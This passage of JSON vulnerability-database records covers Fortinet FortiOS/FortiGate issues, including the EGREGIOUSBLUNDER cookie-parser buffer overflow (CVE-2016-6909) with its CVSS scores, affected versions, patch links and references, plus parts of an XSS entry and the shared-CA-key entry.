"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "https://fortiguard.com/psirt/fg-ir-17-017"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/98048"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id/1038367"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3127"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-3127"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/technology/network-os-fortios.html"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-111330"
},
{
"db": "BID",
"id": "98048"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
},
{
"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-111330"
},
{
"db": "BID",
"id": "98048"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
},
{
"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-06-01T00:00:00",
"db": "VULHUB",
"id": "VHN-111330"
},
{
"date": "2017-04-19T00:00:00",
"db": "BID",
"id": "98048"
},
{
"date": "2017-06-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"date": "2017-04-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-1510"
},
{
"date": "2017-06-01T14:29:00.187000",
"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-111330"
},
{
"date": "2017-05-02T00:11:00",
"db": "BID",
"id": "98048"
},
{
"date": "2017-06-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-004384"
},
{
"date": "2017-06-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201704-1510"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-3127"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet FortiGate Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-004384"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201704-1510"
}
],
"trust": 0.6
}
}
VAR-201608-0364
Vulnerability from variot - Updated: 2025-04-13 23:02Buffer overflow in the Cookie parser in Fortinet FortiOS 4.x before 4.1.11, 4.2.x before 4.2.13, and 4.3.x before 4.3.9 and FortiSwitch before 3.4.3 allows remote attackers to execute arbitrary code via a crafted HTTP request, aka EGREGIOUSBLUNDER. Fortinet FortiOS and FortiSwitch of Cookie The parser contains a buffer overflow vulnerability. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides features such as firewall, anti-virus and intrusion prevention (IPS), application control, anti-spam, wireless controller and WAN acceleration. The vulnerability stems from the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected application and may cause a denial of service. Fortinet FortiGate is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will result in denial-of-service conditions. The following versions are affected: Fortinet FortiGate 4.3.8 and prior Fortinet FortiGate 4.2.12 and prior Fortinet FortiGate 4.1.10 and prior. Fortinet FortiOS and FortiSwitch are products developed by Fortinet
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201608-0364",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortiswitch",
"scope": "lte",
"trust": 1.0,
"vendor": "fortinet",
"version": "3.4.2"
},
{
"model": "fortios",
"scope": "lt",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.3.9"
},
{
"model": "fortios",
"scope": "gte",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.1.0"
},
{
"model": "fortios",
"scope": "gte",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.2.0"
},
{
"model": "fortios",
"scope": "lt",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.1.11"
},
{
"model": "fortios",
"scope": "gte",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.3.0"
},
{
"model": "fortios",
"scope": "lt",
"trust": 1.0,
"vendor": "fortinet",
"version": "4.2.13"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.9,
"vendor": "fortinet",
"version": "4.3.8"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.9,
"vendor": "fortinet",
"version": "4.2.12"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.9,
"vendor": "fortinet",
"version": "4.1.10"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.1.11"
},
{
"model": "fortios",
"scope": "lt",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.2.x"
},
{
"model": "fortios",
"scope": "lt",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.3.x"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.3.9"
},
{
"model": "fortios",
"scope": "lt",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.x"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.8,
"vendor": "fortinet",
"version": "4.2.13"
},
{
"model": "fortiswitch",
"scope": "eq",
"trust": 0.6,
"vendor": "fortinet",
"version": "3.4.2"
},
{
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3"
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "0"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.9"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.2.13"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.1.11"
},
{
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0"
}
],
"sources": [
{
"db": "BID",
"id": "92523"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446"
},
{
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:fortinet:fortios",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:fortinet:fortiswitch",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "92523"
}
],
"trust": 0.3
},
"cve": "CVE-2016-6909",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-6909",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-95729",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2016-6909",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-6909",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2016-6909",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-201608-446",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-95729",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2016-6909",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95729"
},
{
"db": "VULMON",
"id": "CVE-2016-6909"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446"
},
{
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in the Cookie parser in Fortinet FortiOS 4.x before 4.1.11, 4.2.x before 4.2.13, and 4.3.x before 4.3.9 and FortiSwitch before 3.4.3 allows remote attackers to execute arbitrary code via a crafted HTTP request, aka EGREGIOUSBLUNDER. Fortinet FortiOS and FortiSwitch of Cookie The parser contains a buffer overflow vulnerability. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides features such as firewall, anti-virus and intrusion prevention (IPS), application control, anti-spam, wireless controller and WAN acceleration. The vulnerability stems from the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected application and may cause a denial of service. Fortinet FortiGate is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed exploit attempts will result in denial-of-service conditions. \nThe following versions are affected:\nFortinet FortiGate 4.3.8 and prior\nFortinet FortiGate 4.2.12 and prior\nFortinet FortiGate 4.1.10 and prior. Fortinet FortiOS and FortiSwitch are products developed by Fortinet",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-6909"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-383"
},
{
"db": "BID",
"id": "92523"
},
{
"db": "VULHUB",
"id": "VHN-95729"
},
{
"db": "VULMON",
"id": "CVE-2016-6909"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-95729",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=40276",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95729"
},
{
"db": "VULMON",
"id": "CVE-2016-6909"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "92523",
"trust": 2.7
},
{
"db": "NVD",
"id": "CVE-2016-6909",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "40276",
"trust": 1.8
},
{
"db": "PACKETSTORM",
"id": "138387",
"trust": 1.8
},
{
"db": "SECTRACK",
"id": "1036643",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201608-383",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-95729",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2016-6909",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95729"
},
{
"db": "VULMON",
"id": "CVE-2016-6909"
},
{
"db": "BID",
"id": "92523"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-383"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446"
},
{
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"id": "VAR-201608-0364",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-95729"
}
],
"trust": 0.01
},
"last_update_date": "2025-04-13T23:02:45.777000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Cookie Parser Buffer Overflow Vulnerability",
"trust": 0.8,
"url": "http://fortiguard.com/advisory/FG-IR-16-023"
},
{
"title": "Fortinet FortiOS and FortiSwitch Buffer Overflow Vulnerability Fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63770"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95729"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://www.securityfocus.com/bid/92523"
},
{
"trust": 1.9,
"url": "https://www.exploit-db.com/exploits/40276/"
},
{
"trust": 1.8,
"url": "http://fortiguard.com/advisory/fg-ir-16-023"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/138387/egregiousblunder-fortigate-remote-code-execution.html"
},
{
"trust": 1.8,
"url": "https://musalbas.com/2016/08/16/equation-group-firewall-operations-catalogue.html"
},
{
"trust": 1.8,
"url": "http://www.securitytracker.com/id/1036643"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-6909"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-6909"
},
{
"trust": 0.3,
"url": "http://www.fortinet.com/"
},
{
"trust": 0.3,
"url": "http://fortiguard.com/advisory/cookie-parser-buffer-overflow-vulnerability"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/vulnerabilities/fortios-cve-2016-6909"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=48526"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-95729"
},
{
"db": "VULMON",
"id": "CVE-2016-6909"
},
{
"db": "BID",
"id": "92523"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-383"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446"
},
{
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-95729"
},
{
"db": "VULMON",
"id": "CVE-2016-6909"
},
{
"db": "BID",
"id": "92523"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-383"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446"
},
{
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-95729"
},
{
"date": "2016-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2016-6909"
},
{
"date": "2016-08-17T00:00:00",
"db": "BID",
"id": "92523"
},
{
"date": "2016-08-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"date": "2016-08-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-383"
},
{
"date": "2016-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-446"
},
{
"date": "2016-08-24T16:30:00.137000",
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-22T00:00:00",
"db": "VULHUB",
"id": "VHN-95729"
},
{
"date": "2019-05-22T00:00:00",
"db": "VULMON",
"id": "CVE-2016-6909"
},
{
"date": "2016-08-17T00:00:00",
"db": "BID",
"id": "92523"
},
{
"date": "2016-08-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-004445"
},
{
"date": "2016-08-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-383"
},
{
"date": "2019-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201608-446"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2016-6909"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-383"
},
{
"db": "CNNVD",
"id": "CNNVD-201608-446"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Fortinet FortiOS and FortiSwitch of Cookie Parser buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-004445"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201608-383"
}
],
"trust": 0.6
}
}
VAR-201211-0266
Vulnerability from variot - Updated: 2025-04-11 23:18The default configuration of Fortinet Fortigate UTM appliances uses the same Certification Authority certificate and same private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities. The private key, which has been compromised, allows attackers to create and sign fake certificates. FortiGate of UTM The appliance includes CA There is a problem with the handling of the certificate. FortiGate of UTM The appliance is common by default CA It uses a certificate and its private key is publicly available on the web. Therefore, this CA All devices that use certificates may be affected by this vulnerability.Man-in-the-middle attacks by third parties (man-in-the-middle attack) May be eavesdropped on, or malware may be installed. Fortigate UTM appliances is prone to a security-bypass vulnerability. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks and gain access to sensitive information; other attacks are also possible. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201211-0266",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "fortigate-310b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-50b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-200b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3140b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5140b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3950b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1000c",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3040b",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5020",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5060",
"scope": "eq",
"trust": 1.6,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3240c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-300c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-100d",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-600c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-40c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-620b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-voice-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-20c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-1240b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-311b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-3810a",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5101c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-80c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigaterugged-100c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-60c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001b",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-800c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-110c",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate-5001a-sw",
"scope": "eq",
"trust": 1.0,
"vendor": "fortinet",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fortinet",
"version": null
},
{
"model": "fortigate",
"scope": "eq",
"trust": 0.8,
"vendor": "fortinet",
"version": "utm the appliance"
},
{
"model": "unified threat management",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "0"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#111708"
},
{
"db": "BID",
"id": "56382"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-005202"
},
{
"db": "CNNVD",
